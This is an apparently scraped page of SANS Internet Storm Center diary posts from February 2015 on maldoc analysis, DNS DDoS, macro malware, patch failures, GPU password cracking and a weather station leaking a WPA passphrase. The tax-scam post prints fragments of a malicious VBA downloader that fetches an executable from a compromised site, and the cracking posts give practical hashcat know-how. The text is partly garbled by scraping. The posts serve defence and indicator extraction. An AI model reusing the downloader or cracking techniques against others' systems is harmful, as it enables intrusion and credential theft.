Alerts

ISC StormCast for Monday, February 23rd 2015 http://isc.sans.edu/podcastdetail.html?id=4367, (Mon, Feb 23rd)

Latest Alerts - Sun, 02/22/2015 - 18:23
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Leave Things Better Than When You Found Them, (Sun, Feb 22nd)

Latest Alerts - Sat, 02/21/2015 - 16:12

Whether at the end of a project or at the end of your time with an organization, there are some low impact and high reward actions you can take to ensure that youleave things better than when you found them. Although it is not without risk for us as security professionals, if you have the opportunity it is ideal to spend time training your successor before you leave. Through a few intentional actions you can leave a legacy that can serve to inspire others to not only sustain but to actually improve operations.

This topic is particularly close to me now because I have recently started a new position. I had the opportunity to share my experience with others and found it to be rewarding and also a little uncomfortable for me and for the person who was assuming my duties. I found myself personally and professionally vested in the success of the program while recognizing that it was time for me to let go. There are of course certain circumstances that will prevent this sharing from happening. Sometimes policies will dictate that when someone resigns, the team membersare escorted from the premises right away.

Even in you are not making your next career move, maybe you are transitioning from a project and can use this time to help others. The following are some suggestions on what you can provide to your successor:

  • Operational guides
  • Original installation media
  • Configuration checklists
  • Installation guides along with clear documentation of any deviations from the vendorinstructions
  • Lessons learned of things that must be done along with those that must *never* be done
  • Key contacts to support sustaining the project such as administrators, change control tickets and project documentation

Even if you are not on the way out, I recommend that you begin with the end in mind today. Start by setting a monthly reminder on your work calendar to update and maintain your project or program documentation. You may very well recognize that the person thishelps the most is you!

Use the comments section to share what are you doing to leave things better than when you found them.

Russell Eubanks
@russelleubanks
Securityeverafter gmail com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Authentication Bypass in TYPO3 CMS 4.5 - https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2015-001/, (Sat, Feb 21st)

Latest Alerts - Sat, 02/21/2015 - 11:19

----------- Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Friday, February 20th 2015 http://isc.sans.edu/podcastdetail.html?id=4365, (Fri, Feb 20th)

Latest Alerts - Thu, 02/19/2015 - 20:14
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Fast analysis of a Tax Scam, (Fri, Feb 20th)

Latest Alerts - Thu, 02/19/2015 - 17:12

Its tax time and Im starting to see a lot of Phish/SPAM about this subject. Below is popular one the last couple of days.

">TA RTURN FOR E YE">RCLCULTION F YOUR R">HR">LOL OFFI">X REDI FFICR: Jimmie B">T REFUND ID NU">REFUND AOUN">D">The ntents f this emil and n attachmnts ar nfidentil and ">pliabl, yright in thse is resrvd t IRS Rvnu">Unless eprssl uthorised b us, any further diss">distributin of this mail r its ttahmnts is rhibited.

">If you are nt the intnded rcipint f this emil, pls re">infrm us tht u have rived this mil in error and th">delet it without retaining n o">I am snding this emil to annune: After the lst nnul lultin ">yur fiscl ctivit we hv determined that yu r ligibl">rive a tx refund ">Yu hav attahed the ta return form with the TX RFUND NUM">ID: 2440409, omplte the t rturn frm ttched to this mssag.

">Aftr mleting the form, ples submit th frm by clicking th">SUMI buttn n f">Sin">Jimmi ">IRS Tax Credit ">A RFUND ID: US2440409-IRS

"> yright 2015, IRS Rvenue m ust">ll rights r">======================

">With so many of these types of mails, analysis needs to be quick to determine who may have been affected. "> ">$mv tax_refund_2440409.zip MALWARE-tax_refund_2440409.zip

"> ">">inflating: [Content_Types].xml ">inflating: _rels/.rels ">inflating: word/_rels/document.xml.rels ">inflating: word/document.xml ">inflating: word/header3.xml ">inflating: word/footer2.xml ">inflating: word/footer1.xml ">inflating: word/header2.xml ">inflating: word/header1.xml ">inflating: word/endnotes.xml ">inflating: word/footnotes.xml ">inflating: word/footer3.xml ">inflating: word/theme/theme1.xml ">inflating: word/_rels/vbaProject.bin.rels ">inflating: word/vbaProject.bin ">">inflating: word/settings.xml ">inflating: word/vbaData.xml ">inflating: word/webSettings.xml ">inflating: word/styles.xml ">inflating: docProps/app.xml ">inflating: docProps/core.xml ">inflating: word/fontTable.xml


"> ">The vbaProject.bin is the code we want to look at and need to run strings on it.

">$strings /word/vbaProject.bin

">">">$someFilePath = ">...


">Within about 2 minutes I was able to determine some basic IOCs and sees if anyone actually accessed the site or tried to ping the address.

">If you want to dig deeper and spend a bit more time, you can install and configure oledump which was discussed on (hxxps://isc.sans.edu/diary/oledump+analysis+of+Rocket+Kitten+-+Guest+Diary+by+Didier+Stevens/19137).

">">A1: 556 PROJECT">A2: 71 PROJECTwm">A3: 97 UserForm1/\x01CompObj">A4: 266 UserForm1/\x03VBFrame">A5: 58 UserForm1/f">A6: 0 UserForm1/o">A7: M 25751 VBA/ThisDocument">A8: m 1159 VBA/UserForm1">A9: 4506 VBA/_VBA_PROJECT">A10: 811 VBA/dir

">$python oledump.py -s A7 -v MALWARE-tax_refund_2440409.doc

">">Print #FileNumber, strRT = + Chr(34) + h + Chr(Asc(Chr(Asc(t)))) + t + p + ://www.zaphira.de/wp-admin/includes/file + . + Chr(Asc(e)) + Chr(Asc(x)) + e">">Print #FileNumber, $someFilePath = c:\Users\ + USER + \AppData\Local\Temp\ + 444.e Chr(Asc(x)) + e


">In this case, oledump gave us a lot more info, but proves we were on the right track with simple strings of the file. Additionally, we can see an infected user may have a file called 444.exe . There are lots more local IOCs we could create, but with the few network IOCs we can get fast idea of possible affected users.

--

Tom Webb

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Thursday, February 19th 2015 http://isc.sans.edu/podcastdetail.html?id=4363, (Thu, Feb 19th)

Latest Alerts - Wed, 02/18/2015 - 19:47
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

DNS-based DDoS, (Thu, Feb 19th)

Latest Alerts - Wed, 02/18/2015 - 16:45

ISC reader Zach reports that his company currently sees about 4Gbps of DNS requests beyond what is normal, and all seem to originate from 91.216.194.0/24. Yup, someone on that IP range in Poland is likely having a slow network day.

To make it less likely that your DNS servers unwittingly participate in a denial of service attack against someone else, consider using rate-limiting. If you are not running a massively popular eCommerce site, odds are your bandwidth and the load limit of your DNS server are way way beyond what you actually need.

The easiest way to rate-limit (if you use Linux) is to put an iptables rule on port 53 that controls how many packets per source IP address will be accepted per minute. BIND, one of the most popular DNS servers, introduced a response rate-limiting option in version 9.10 that allows to define how many responses per second the server will provide before it punts. Both are good ideas if you run an authoritative DNS server that has way more bandwidth and muscle than your actual usage requires.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Macros? Really?!, (Thu, Feb 19th)

Latest Alerts - Wed, 02/18/2015 - 16:15

Yes indeed! While the past 15 years or so were mostly devoid of any significant macro viruses, macro-based malware is now making a successful comeback. Last week, we saw a significant Dridex malware run that was using macros in Excel files (.XLSM), and earlier this week, the crooks behind the banking spyware Vawtraq started to spam the usual Fedex Package and Tax Refund emails, but unlike in other malspam runs, the attachment was no longer a ZIP with an EXE or SCR inside, but rather a file in Microsoft Office .DOC format. File extension based blocking on the email gateway is not going to save your bacon on this one!

For Vawtraq, if the recipient opens the DOC, the content looks garbled, and the only readable portion is in (apparently) user-convincing red font, asking the recipient to enable macros. You can guess what happens next if the user falls for it...: A VBS and Powershell file get extracted from the DOC, and then download and run the Vawtraq malware executable. The whole mess has very low detection in anti-virus, yesterdays Vawtraq started with zero hits on VirusTotal, and even today, one day later, it hasnt made it past 7/52 anti-virus engines detecting the threat yet. Thus, odds are you will need to revert to manual analysis to determine if a suspicious Office document is indeed malicious, and to extract any indicators from it that can help to discover users on your network who have been had.

Besides Didier Stevens oledump that we covered last month, my favorite toolkit for this analysis is the python-oletools package by Philippe Lagadec. olevba in particular does a great job at parsing out all the obfuscated code, and is often even able to extract actionable indicators of compromise (IOC), like URLs and IP addresses. The example below is an abbreviated olevba analysis of a recent Dridex run, and it nicely shows how the next stage URL and EXE name are pulled out in one quick swoop. Give it a try!

" />

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, February 18th 2015 http://isc.sans.edu/podcastdetail.html?id=4361, (Wed, Feb 18th)

Latest Alerts - Tue, 02/17/2015 - 19:48
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

A Different Kind of Equation, (Tue, Feb 17th)

Latest Alerts - Tue, 02/17/2015 - 02:37

Both the mainstream media and our security media is abuzz with Kasperksys disclosure of their research on the Equation group and the associated malware. You can find the original blog post here: http://www.kaspersky.com/about/news/virus/2015/equation-group-the-crown-creator-of-cyber-espionage

But if you want some real detail, check out the Q http://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf

Way more detail, and much more sobering to see that this group of malware goes all the way back to 2001, and includes code to map disconnected networks (using USB key CC like Stuxnet did), as well as the disk firmware facet thats everyones headline today.

Some Indicators of Compromise, something we can use to identify if our organizations or clients are affected - are included in the PDF. The DNS IoCs included are especially easy to use, either as checks against logs or as black-hole entries.

===============
Rob VandenBrink
Metafore

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Tuesday, February 17th 2015 http://isc.sans.edu/podcastdetail.html?id=4359, (Tue, Feb 17th)

Latest Alerts - Mon, 02/16/2015 - 19:42
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Throwing more Hardware at Password Cracking - Lessons Learned, (Tue, Feb 17th)

Latest Alerts - Mon, 02/16/2015 - 19:17

A while back I put an article up on exposing a GPU up to a virtual machine for cracking password hashes (https://isc.sans.edu/forums/diary/Building+Your+Own+GPU+Enabled+Private+Cloud/16505). This worked great for me for a while, but then it became evident that 1 or two GPUs just wasnt enough - each GPU adds a linear amount of processing power, so 6 GPUs will solve problems 6 times faster than a single. Problems like cracking wireless keys, windows passwords, passwords on documents or databases, any number of things (150 different hash types in the latest version hashcat).

What I found when I added more GPUs to my ESX host was that theres a limit on VT-d (DirectPath I/O in ESX) - you can only assign up to 8 devices in ESXi 5.x. Since each GPU represents 2 devices, thats only 4 GPUs. (http://kb.vmware.com/selfservice/microsites/search.do?language=en_UScmd=displayKCexternalId=1010789)

So I had to go to a physical server to get past 4. What more is there to learn you ask? First of all, the Linux drivers just dont cut it. Getting more than a few GPUs to be recognized from one reboot to the next is a challenge, even if you use the exact OS Versions and drivers recommended. Even getting lspci to see them all was a gamble - each time I powered the server on was a roll of the dice.

Windows drivers work fairly well - however, in Windows 7 theres a hard limit of 4 AMD GPUs (mine are AMD R9 280xs) buried in the driver - dont forget that these are supposed to be graphics adapters, and limiting a system to 4 PCIE x16 graphics card actually makes decent sense. However, were not using these for graphics! You can fix this limit with some judicious registry edits, but these vary quite a bit depending on the GPU model and OS. The fine folks at lbr.id.lv put together an executable (6xGPU_Mod) that builds the reg changes for your setup - find it here:
https://lbr.id.lv/6xgpu_mod/6xGPU_mod.html

But wait, theres more! OCLHashcat requires a specific version of the AMD drivers to work correctly. Again, these are graphics cards, and the newer versions of the driver dont lend themselves to computation apparently (a bug that doesnt affect graphics affects mathematical calculation). Todays recommendation (for oclhashcat) is to use AMD driver version 14.9 (exactly), and no other. This version recommendation does change - refer back to the documentation for whatever tools you are using for driver version recommendations.

Also, dont skimp on power supplies. I have 2500W available (2x1250) for these 6 GPUs and the powered risers that feed them, plus the power supply for the system unit. If the cards dont have enough power, either theyll just run slower, or they wont run - either way its an easy fix. And if you have issues during the build (everyone does on these), ruling out power problems is a good start in resolving these problems. I budget 300W per card - likely at least a bit overkill, but Id rather have a bit extra than be a bit short. The old proverb when in doubt, max it out is a good one for a reason.

At long last though, I now have 6 GPUs dedicated to cracking whatever encrypted information I need to throw them at!

One final note - yes, I do know that you can spin up an AWS instance with GPUs to perform similar functions. In my practice though, Im not comfortable cracking customer passwords on someone elses server. Also, in my previous rig, it was not uncommon to see password cracking runs for a typical list of hashes take 5-7 days, with 2 GPUs running flat-out - depending on the list and the hashing algorithm, this can run up to some serious computation time, which costs real dollars in a cloud service. Bumping the count up to 6 GPUs in my own build cuts the time for me down by a factor of 3 for a pretty low cost, and still keeps the password hashes (and cracked passwords) in my own rack of servers.

If youve found other gotchas in this sort of implementation, or if youve had good luck using a cloud service for stuff like this, please, use our comment form and let us know how youve fared !

===============
Rob VandenBrink
Metafore

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

oclHashcat 1.33 Released, (Tue, Feb 17th)

Latest Alerts - Mon, 02/16/2015 - 19:01

In the authors own words, oclHashcat 1.33 is what 1.32 should have been. I think theyre too hard on themselves - - 1.32 was pretty darned good too. There are a number of good changes in 1.33 though - of interest to most of us is support for PDF passwords and PBKDF2 (2 variants of that so far). Look for more PBKDF2 variants in days to come - version 1.33 sees a PBKDF2 kernel added. Also a new feature that will affect the bottom line of many folks who use oclhashcat - wordlist processing is now multithreaded, so expect to see dictionary attacks run quicker.

So if your client took your advice and moved their MD5 hashed password database to PBKDF2, with a few more GPUs you can make a point on that new method as well. Though Im not sure what youd recommend to replace PBKDF2 ...

In my rig (6 GPUs), Im seeing 3 million hashes per second on PBKDF2, and 30,000 hashes per second on PDF 1.7 level 8 (Acrobat 10 or 11). So PBKDF2 is still way more computationally expensive than MD5 (now tracking around 54 Billion hashes per second), but if you use intelligent, targeted password lists - maybe using CEWL for a base list and perhaps some numeric / season mods folded into those words, you can still make a serious dent in a list of poorly chosen passwords (in other words, almost any hashed password list).

Happy password cracking!

===============
Rob VandenBrink
Metafore

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Microsoft Patch Mayhem: February Patch Failure Summary, (Mon, Feb 16th)

Latest Alerts - Mon, 02/16/2015 - 07:03

February was another rough month for anybody having to apply Microsoft patches. We had a couple of posts already covering the Microsoft patch issues, but due to the number of problems, here a quick overview of what has failed so far:

Bulletin/KB # Patch Symptom Solution MS15-009
KB 3023607 SSL fix to address the POODLE vulnerability. Cisco AnyConnect will refuse to connect run AnyConnectclientin Windows 7 or Windows 8 Compatibilty Mode KB2920732 PowerPoint (functionality fix, not a security patch) Powerpoint 2013 fails to start on Windows RT refresh your device (seehttps://support.microsoft.com/kb/2751424 ) or remove patch. Microsoft did withdraw the patch. MS15-010
KB3013455 Windows Kernel Mode Drivers Font quality degrades in Windows Vista SP2 and Windows Server 2003 SP2 (also affected: Windows XP if you paid for extended support). remove patch KB3001652 Update for Microsoft Visual Studio 2010 Tools for Office Runtime Patch will not finish installing and hang making the system unresponsive

This patch has to be installed as Administrator. Otherwise, the user will not see a dialog box that needs to be acknowledged to complete the install. Microsoft withdrew the patch and later reissued it. No problems with the re-issued version.

There are 3 versions">important reminder that the Group Policy patch alone does not fix the actual vulnerability. In addition to applying the patch, you have to enable the new group policy options:

Seehttps://support.microsoft.com/kb/3000483for details.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Monday, February 16th 2015 http://isc.sans.edu/podcastdetail.html?id=4357, (Mon, Feb 16th)

Latest Alerts - Sun, 02/15/2015 - 19:02
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

End of the m0n0wall project - http://seclists.org/oss-sec/2015/q1/565, (Sun, Feb 15th)

Latest Alerts - Sun, 02/15/2015 - 14:10

----------- Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Microsoft February Patch Failures Continue: KB3023607 vs. Cisco AnyConnect Client, (Fri, Feb 13th)

Latest Alerts - Fri, 02/13/2015 - 09:32

Another patch released by Microsoft this month is causing problems. This time it is KB3023607,which was supposed to mitigate the POODLE vulnerability. Once applied, Cisco AnyConnect users are no longer able to connect to their VPN.

For more details, also see the Cisco bug report https://tools.cisco.com/bugsearch/bug/CSCus89729(requires login).

The issue appears to affect Windows 8.1, in which case running the application (vpnui.exe) in Windows 8 compatibility mode will fix the problem for now.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Friday, February 13th 2015 http://isc.sans.edu/podcastdetail.html?id=4355, (Fri, Feb 13th)

Latest Alerts - Fri, 02/13/2015 - 03:59
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Did You Remove That Debug Code? Netatmo Weather Station Sending WPA Passphrase in the Clear, (Thu, Feb 12th)

Latest Alerts - Fri, 02/13/2015 - 03:59

(BTW: it looks like the firmware update released this week by netatmo after reporting this issue fixes the problem. Still trying to completely verify that this is the case)

I have the bad habit of playing with home automation and various data acquisition tools. I could quit any time ifI wanted to, but so far, I decided not to. My latest toy to add to the collection was a Netatmo" />

Setting up the device was pretty straight forward, and looked secure. It requires connecting to the device via USB, and a custom application is used to configure the device with your username, password and WiFi settings including the WiFi password. After the initial setup, the station needs USB for power only, and communicates via WiFi to the Cloud.

But after the simple setup, a nice surprise">[**] [1:1000284:0] WPA PSK Passphrase Leak [**] [Priority: 0] {TCP} a.b.c.d:21908 - 195.154.176.41:25050

I do have a custom rule in my snort rule set, alerting me of the passphrase">alert ip any any - msg: WPA PSK Passphrase Leak content: [Iamnotgoingtotellyou] )

So what happened? After looking at the full capture of the data, I found that indeed the weather station sent my password to the cloud, along with some other data. The data include the weather stations MAC address, the SSIDof the WiFi network, and some hex encoded snippets.

Not only should data like this not be transmitted in the clear, but in addition, there is no need for Netatmo to know the WPA password for my network.">">We will remove this debug memory very soon (coming weeks).

So far I havent seen any additional transmissions from the weather station containing the password, even after restarting it. I didnt do a full factory reset yet.But in general, the data appears to be unencrypted. The MAC address of the station and the outdoor sensor are easily found in the payload. So far, I couldnt find a documentation for the protocol, so it will take a bit more time to reverse it.

According to the weather station map provided by Netatmo, these devices are already quite popuplar. Here a snapshot of the map in my Neighborhood" />

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Thursday, February 12th 2015 http://isc.sans.edu/podcastdetail.html?id=4353, (Thu, Feb 12th)

Latest Alerts - Wed, 02/11/2015 - 17:25
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts
Syndicate content